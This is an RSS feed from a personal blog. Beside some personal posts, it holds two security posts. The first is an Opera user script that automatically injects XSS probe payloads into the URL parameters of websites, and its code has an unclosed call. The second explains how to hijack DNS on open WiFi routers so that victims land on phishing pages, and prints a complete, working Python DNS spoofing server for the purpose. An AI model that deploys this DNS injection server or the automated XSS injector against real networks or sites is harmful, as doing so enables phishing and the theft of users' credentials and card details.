<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	xmlns:georss="http://www.georss.org/georss" xmlns:geo="http://www.w3.org/2003/01/geo/wgs84_pos#" xmlns:media="http://search.yahoo.com/mrss/"
	>

<channel>
	<title>Samaldis&#039;s Blog</title>
	<atom:link href="http://samaldis.wordpress.com/feed/" rel="self" type="application/rss+xml" />
	<link>http://samaldis.wordpress.com</link>
	<description>An archive of some of my work</description>
	<lastBuildDate>Fri, 08 Oct 2010 22:02:34 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.com/</generator>
<cloud domain='samaldis.wordpress.com' port='80' path='/?rsscloud=notify' registerProcedure='' protocol='http-post' />
<image>
		<url>http://s2.wp.com/i/buttonw-com.png</url>
		<title>Samaldis&#039;s Blog</title>
		<link>http://samaldis.wordpress.com</link>
	</image>
	<atom:link rel="search" type="application/opensearchdescription+xml" href="http://samaldis.wordpress.com/osd.xml" title="Samaldis&#039;s Blog" />
	<atom:link rel='hub' href='http://samaldis.wordpress.com/?pushpress=hub'/>
		<item>
		<title>recent photo.. bit emo i know</title>
		<link>http://samaldis.wordpress.com/2010/10/08/recent-photo-bit-emo-i-know/</link>
		<comments>http://samaldis.wordpress.com/2010/10/08/recent-photo-bit-emo-i-know/#comments</comments>
		<pubDate>Fri, 08 Oct 2010 22:02:23 +0000</pubDate>
		<dc:creator>samaldis</dc:creator>
				<category><![CDATA[My life]]></category>

		<guid isPermaLink="false">https://samaldis.wordpress.com/2010/10/08/recent-photo-bit-emo-i-know/</guid>
		<description><![CDATA[Here&#8217;s a photo I took after buying my superdry jacket..<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=samaldis.wordpress.com&amp;blog=6837237&amp;post=27&amp;subd=samaldis&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p><a href="http://samaldis.files.wordpress.com/2010/10/2010-09-13-20-45-55.jpg"><img class="alignnone size-full" src="http://samaldis.files.wordpress.com/2010/10/2010-09-13-20-45-55.jpg?w=497" alt="" title="superdry"   /></a></p>
<p>Here&#8217;s a photo I took after buying my superdry jacket.. <img src='http://s0.wp.com/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> </p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/samaldis.wordpress.com/27/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/samaldis.wordpress.com/27/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/samaldis.wordpress.com/27/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/samaldis.wordpress.com/27/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/samaldis.wordpress.com/27/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/samaldis.wordpress.com/27/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/samaldis.wordpress.com/27/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/samaldis.wordpress.com/27/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/samaldis.wordpress.com/27/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/samaldis.wordpress.com/27/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/samaldis.wordpress.com/27/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/samaldis.wordpress.com/27/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/samaldis.wordpress.com/27/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/samaldis.wordpress.com/27/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=samaldis.wordpress.com&amp;blog=6837237&amp;post=27&amp;subd=samaldis&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://samaldis.wordpress.com/2010/10/08/recent-photo-bit-emo-i-know/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/08757ad12a4bc7a9c8a542cb4d9492e9?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">samaldis</media:title>
		</media:content>

		<media:content url="http://samaldis.files.wordpress.com/2010/10/2010-09-13-20-45-55.jpg" medium="image">
			<media:title type="html">superdry</media:title>
		</media:content>
	</item>
		<item>
		<title>back.</title>
		<link>http://samaldis.wordpress.com/2010/10/08/back/</link>
		<comments>http://samaldis.wordpress.com/2010/10/08/back/#comments</comments>
		<pubDate>Fri, 08 Oct 2010 14:49:22 +0000</pubDate>
		<dc:creator>samaldis</dc:creator>
				<category><![CDATA[Uncategorized]]></category>

		<guid isPermaLink="false">https://samaldis.wordpress.com/2010/10/08/back/</guid>
		<description><![CDATA[I have recently made the change from android to blackberry and because it is so easy to type on this phone I have decided to start publishing to my blog again.. .. I haven&#8217;t decided whether to blog about my personal life or my web security side of things.. Or both. Just watch this space..<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=samaldis.wordpress.com&amp;blog=6837237&amp;post=23&amp;subd=samaldis&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>I have recently made the change from android to blackberry and because it is so easy to type on this phone I have decided to start publishing to my blog again.. <img src='http://s0.wp.com/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> .. I haven&#8217;t decided whether to blog about my personal life or my web security side of things.. Or both. Just watch this space..</p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/samaldis.wordpress.com/23/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/samaldis.wordpress.com/23/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/samaldis.wordpress.com/23/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/samaldis.wordpress.com/23/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/samaldis.wordpress.com/23/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/samaldis.wordpress.com/23/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/samaldis.wordpress.com/23/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/samaldis.wordpress.com/23/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/samaldis.wordpress.com/23/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/samaldis.wordpress.com/23/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/samaldis.wordpress.com/23/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/samaldis.wordpress.com/23/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/samaldis.wordpress.com/23/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/samaldis.wordpress.com/23/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=samaldis.wordpress.com&amp;blog=6837237&amp;post=23&amp;subd=samaldis&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://samaldis.wordpress.com/2010/10/08/back/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/08757ad12a4bc7a9c8a542cb4d9492e9?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">samaldis</media:title>
		</media:content>
	</item>
		<item>
		<title>Black Liquid</title>
		<link>http://samaldis.wordpress.com/2009/09/28/black-liquid/</link>
		<comments>http://samaldis.wordpress.com/2009/09/28/black-liquid/#comments</comments>
		<pubDate>Mon, 28 Sep 2009 17:09:07 +0000</pubDate>
		<dc:creator>samaldis</dc:creator>
				<category><![CDATA[Uncategorized]]></category>

		<guid isPermaLink="false">http://samaldis.wordpress.com/?p=18</guid>
		<description><![CDATA[this page can be found here: http://www.spinhunters.org/blog/black-liquid/<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=samaldis.wordpress.com&amp;blog=6837237&amp;post=18&amp;subd=samaldis&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>this page can be found here:</p>
<p><a title="http://www.spinhunters.org/blog/black-liquid/" href="http://www.spinhunters.org/blog/black-liquid/" target="_blank">http://www.spinhunters.org/blog/black-liquid/</a></p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/samaldis.wordpress.com/18/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/samaldis.wordpress.com/18/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/samaldis.wordpress.com/18/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/samaldis.wordpress.com/18/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/samaldis.wordpress.com/18/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/samaldis.wordpress.com/18/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/samaldis.wordpress.com/18/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/samaldis.wordpress.com/18/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/samaldis.wordpress.com/18/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/samaldis.wordpress.com/18/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/samaldis.wordpress.com/18/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/samaldis.wordpress.com/18/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/samaldis.wordpress.com/18/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/samaldis.wordpress.com/18/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=samaldis.wordpress.com&amp;blog=6837237&amp;post=18&amp;subd=samaldis&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://samaldis.wordpress.com/2009/09/28/black-liquid/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/08757ad12a4bc7a9c8a542cb4d9492e9?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">samaldis</media:title>
		</media:content>
	</item>
		<item>
		<title>Opera Security Scripts</title>
		<link>http://samaldis.wordpress.com/2009/03/09/opera-security-scripts/</link>
		<comments>http://samaldis.wordpress.com/2009/03/09/opera-security-scripts/#comments</comments>
		<pubDate>Mon, 09 Mar 2009 00:31:34 +0000</pubDate>
		<dc:creator>samaldis</dc:creator>
				<category><![CDATA[Uncategorized]]></category>

		<guid isPermaLink="false">http://samaldis.wordpress.com/2009/03/09/opera-security-scripts/</guid>
		<description><![CDATA[First Published on the now closed 0&#215;000000.com: I got this sent in by Sam Aldis, two nice user scripts created for Opera to test the security in websites by automating XSS c.q. SQL injection. This is really useful if you want to test websites actually. Secondly he also has a simple Javascript console, which in [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=samaldis.wordpress.com&amp;blog=6837237&amp;post=19&amp;subd=samaldis&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>First Published on the now closed 0&#215;000000.com:</p>
<div class="adsense"><ins><ins></ins></ins></div>
<p>I got this sent in by Sam Aldis, two nice user scripts created for Opera to test the security in websites by automating XSS c.q. SQL injection. This is really useful if you want to test websites actually. Secondly he also has a simple Javascript console, which in term can be quite useful also. I always wanted to write something similar, so nice ideas to expand on. I also thought about the idea to have Opera run on my second PC which will be dedicated in testing websites for instance. This way you can create a Nessus like scanner, integrated in Opera. Why not, it is certainly possible and only limited by your imagination. By the way, did you know that Opera now has a UserScript virtual I/O file-system <a href="http://dev.opera.com/libraries/fileio/docs/opera.io.filesystem.dml">API</a> in it&#8217;s new version? this enables you to read and write to the computer it runs on in a safe manner. It creates an environment of more possibilities in stable way for analyzing websites and storing the results if necessary.</p>
<p>aWaT script:</p>
<pre>(function(opera){
/*
	aWaT - Automated Web Attack (A-Wah)
	Created By Sam Aldis
	http://darkstar.me.uk

	thanks to 0x000000.com for the insperation and introducing me to
	opera as well as the layout for the output.
*/

	// The getCookie function can be used to retrieve a specific cookie
	// this cookie must have been set with the setCookie function
	// probably not the easiest way to do it but it works.
	getCookie = function(con){
		var c = document.cookie;
		var cn = con;
		var cnm = 0;
		var s = 0;
		var e = 0;
		var xf = 0;
		for(i=0;i&lt;c.length;i++){
			if(cnm&gt;=cn.length){
				var s = i;
			}
			if(c[i]==cn[cnm]){
				cnm++;
			}
			else{
				cnm = 0;
			}
			if(s != 0 &amp;&amp; e == 0){
				if(c[i] == ":"){
					e = i;
				}
			}
		}
		var text = c.substr(s+1,e-s-1);
		return(text);
	}
	// sets a cookie using ":" as the delimiter
	// as singular cookies won't have ; at the end.
	setCookie = function(cname,data){
		void(document.cookie = cname + "=" + data + ":");
	}
	// set the get vars that maybe vulnerable
	var vars = ['q','query','search','page','username','user','id','tag','record','listing','name','type','text','msg','message'];
	// sets other variables
	var crlf = ". \r\n";
	var xss_msg = "";
	// main body of the code
	if(getCookie("awat")!="2"){
		window.addEventListener('load', function(e) {
			if(document.location.href.indexOf("&amp;endt=1")!=-1){
					setCookie("awat","2");
			}
			else{
				if(getCookie("awat") != 1){
					if(document.body.innerHTML.indexOf("&lt;script&gt;void(192)&lt;/script&gt;")== -1){
						for(k=0;k&lt;vars.length + 1;k++){
							if(document.location.href.indexOf("&amp;" + vars[k] + "=") &gt; 0 || document.location.href.indexOf("?" + vars[k] + "=") &gt; 0){
								if(getCookie("awat")==""||getCookie("awat")=="0"){
									var cloc = document.location.href;
									xss_msg += "Possible XSS in variable " + vars[k] + crlf;
									var nloc = cloc + "&amp;" + vars[k] + "=" + "&lt;script&gt;void(192)&lt;/script&gt;";
									setCookie(
									document.location = nloc + "&amp;01536362";
								}
							}
						}
					}
					else{
						xss_msg += "XSS found at location: " + document.location.href + crlf;
						xf = 1;
					}
				}
				else{
					if(document.body.innerHTML.indexOf("&lt;script&gt;void(192)&lt;/script&gt;") == -1){
						xss_msg += "No XSS found in page" + crlf;
						xf = 1;
					}
				}
				if (xss_msg != '' &amp;&amp; xss_msg != undefined ) {
					if(xf = 1){
						// displays the output text, style taken from arioso created
						// by 0x000000.com.
						var p = document.createElement('a');
						p.style.position = 'fixed';
				                p.style.top = '0px';
				                p.style.left  = '0px';
				                p.style.width = '100%';
						p.style.opacity = '.90';
						p.style.filter = 'alpha(opacity=90)';
				                p.style.border = '1px dotted #f30';
				                p.style.padding = '3px';
				                p.style.font = '8pt sans-serif';
				                p.style.backgroundColor  = '#f00';
				                p.style.color = '#fff';
						p.href = document.location + "&amp;endt=1";
						p.appendChild(document.createTextNode('aWa message: ' + xss_msg + " Click to stop testing on this domain"));
						document.body.appendChild(p);
						if(document.location.href.indexOf("&amp;01536362") == -1){
							setCookie("awat","0");
						}
						else{
							setCookie("awat","1");
						}
					}
			    }
			}
		}, false);
	}
})(window.opera);</pre>
<p>Javascript console script:</p>
<pre>/*
	Javascript Console@http://www.google.co.uk/js
	created by Sam Aldis

	A very simple way to execute javascript in your browser.
*/
(function(opera){
	window.addEventListener('load',function(e) {
		if(document.location.href == "http://www.google.co.uk/js"){
			document.title = "JS Console";
			document.body.innerHTML = "&lt;style&gt;body{ background-color: black; color: red;}textarea{background-color:black; color: red;}input{background-color: black; color: red;}&lt;/style&gt;&lt;div align='center'&gt;&lt;img src='http://www.google.co.uk/intl/en_uk/images/logo.gif'&gt;&lt;br /&gt;&lt;textarea id='js' name='js' cols='60' rows='20'&gt;javascript&lt;/textarea&gt;&lt;br /&gt;&lt;input type='button' value='Eval' onclick='eval(document.getElementById(\"js\").value)'&gt;&lt;/div&gt;";
		}},false);
})(window.opera);</pre>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/samaldis.wordpress.com/19/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/samaldis.wordpress.com/19/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/samaldis.wordpress.com/19/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/samaldis.wordpress.com/19/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/samaldis.wordpress.com/19/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/samaldis.wordpress.com/19/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/samaldis.wordpress.com/19/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/samaldis.wordpress.com/19/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/samaldis.wordpress.com/19/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/samaldis.wordpress.com/19/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/samaldis.wordpress.com/19/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/samaldis.wordpress.com/19/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/samaldis.wordpress.com/19/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/samaldis.wordpress.com/19/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=samaldis.wordpress.com&amp;blog=6837237&amp;post=19&amp;subd=samaldis&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://samaldis.wordpress.com/2009/03/09/opera-security-scripts/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/08757ad12a4bc7a9c8a542cb4d9492e9?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">samaldis</media:title>
		</media:content>
	</item>
		<item>
		<title>Wifi Ownage</title>
		<link>http://samaldis.wordpress.com/2009/03/09/wifi-ownage/</link>
		<comments>http://samaldis.wordpress.com/2009/03/09/wifi-ownage/#comments</comments>
		<pubDate>Mon, 09 Mar 2009 00:25:31 +0000</pubDate>
		<dc:creator>samaldis</dc:creator>
				<category><![CDATA[Uncategorized]]></category>

		<guid isPermaLink="false">http://samaldis.wordpress.com/?p=15</guid>
		<description><![CDATA[I have recently been doing research into WiFi connections without wepkeys and where the attacker is able to change the primary DNS server on the router. This is actually a very serious problem as the attacker is able to get your credit card details or any other information you input without you even knowing. Imagine [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=samaldis.wordpress.com&amp;blog=6837237&amp;post=15&amp;subd=samaldis&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<div class="screen"><a href="http://flickr.com/photos/mulletar/234750266/"><img src="http://farm1.static.flickr.com/42/234750266_35dd875a8c.jpg?v=0" alt="WARNING: LOAFING AROUND OR DANCING WILL RESULT IN OWNAGE" /></a></div>
<p>I have recently been doing research into WiFi connections without wepkeys and where the attacker is able to change the primary DNS server on the router. This is actually a very serious problem as the attacker is able to get your credit card details or any other information you input without you even knowing.</p>
<p>Imagine you are at a hotel with your laptop. You connect to the WiFi that they provide and type in www.google.com, which brings up google’s front page. The address bar says http://www.google.com and the page looks genuine so it is.. isn’t it? However, attackers may could have got access to the router and changed the primary DNS server through many of the available methods in the wild, like <a href="http://www.gnucitizen.org/blog/hacking-with-upnp-universal-plug-and-play">UPnP hacking</a>, etc.</p>
<p>Theoretically, the attacker could use any IP address to pull the trick, as long as a DNS server was running behind the UDP port 53. But it would be more beneficial if the attacker is under control of this DNS server, so he/she is able to show the user what ever they want them to see. For example, the user could type in their bank’s website address and end up at a phishing page but they wouldn’t know because they would see their banks address in the title bar and the page could be made to look exactly the same (and auto-update itself through some PHP magic). When the user logs in, a fake DNS server will respond which will make the user go to the wrong IP address. As you can see this is a big threat that will affect anyone who hasn’t secured their network.</p>
<p>I have created a python script which can act as a temporary DNS server which will direct all requests to a certain IP (keep checking <a href="http://darkstar.me.uk/">http://darkstar.me.uk</a> for updates). Here is the script that complies to the scenarios described above:</p>
<pre><code># DNS Injection Server
# Created By fazed
# DNSQuery class adapted from Francisco Santos's
# code. why re-invent the wheel?

from socket import *

class DNSQuery:
 def __init__(self, data):
   self.data=data
   self.domain=''

   tipo = (ord(data[2]) &gt;&gt; 3) &amp; 15
   if tipo == 0:
     ini=12
     lon=ord(data[ini])
     while lon != 0:
       self.domain+=data[ini+1:ini+lon+1]+'.'
       ini+=lon+1
       lon=ord(data[ini])

 def respond(self, ip):
   packet=''
   if self.domain:
     packet+=self.data[:2] + "\x81\x80"
     packet+=self.data[4:6] + self.data[4:6] + '\x00\x00\x00\x00'
     packet+=self.data[12:]
     packet+='\xc0\x0c'
     packet+='\x00\x01\x00\x01\x00\x00\x00\x3c\x00\x04'
     packet+=str.join('',map(lambda x: chr(int(x)), ip.split('.')))
   return packet

print ":: DNS Injection Server Started ::"
sh = socket(AF_INET, SOCK_DGRAM)
print "Socket Handle Created.."
sh.bind(('',53))
print "Socket Handle Bound To UDP Port 53"
ip = raw_input("IP to inject: ")
try:
   while 1:
       data, addr = sh.recvfrom(1024)
       print "DNS Request From:", addr[0]
       p = DNSQuery(data)
       print "Sending IP address:", ip
       sh.sendto(p.respond(ip),addr)
       print "Response Sent.."
except KeyboardInterrupt:
   print ":: DNS Injection Server Stoped ::"
   sh.close()</code></pre>
<p>The bottom line is: secure your networks and don’t trust public WiFi access points.</p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/samaldis.wordpress.com/15/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/samaldis.wordpress.com/15/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/samaldis.wordpress.com/15/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/samaldis.wordpress.com/15/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/samaldis.wordpress.com/15/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/samaldis.wordpress.com/15/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/samaldis.wordpress.com/15/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/samaldis.wordpress.com/15/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/samaldis.wordpress.com/15/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/samaldis.wordpress.com/15/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/samaldis.wordpress.com/15/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/samaldis.wordpress.com/15/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/samaldis.wordpress.com/15/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/samaldis.wordpress.com/15/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=samaldis.wordpress.com&amp;blog=6837237&amp;post=15&amp;subd=samaldis&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://samaldis.wordpress.com/2009/03/09/wifi-ownage/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/08757ad12a4bc7a9c8a542cb4d9492e9?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">samaldis</media:title>
		</media:content>

		<media:content url="http://farm1.static.flickr.com/42/234750266_35dd875a8c.jpg?v=0" medium="image">
			<media:title type="html">WARNING: LOAFING AROUND OR DANCING WILL RESULT IN OWNAGE</media:title>
		</media:content>
	</item>
	</channel>
</rss>
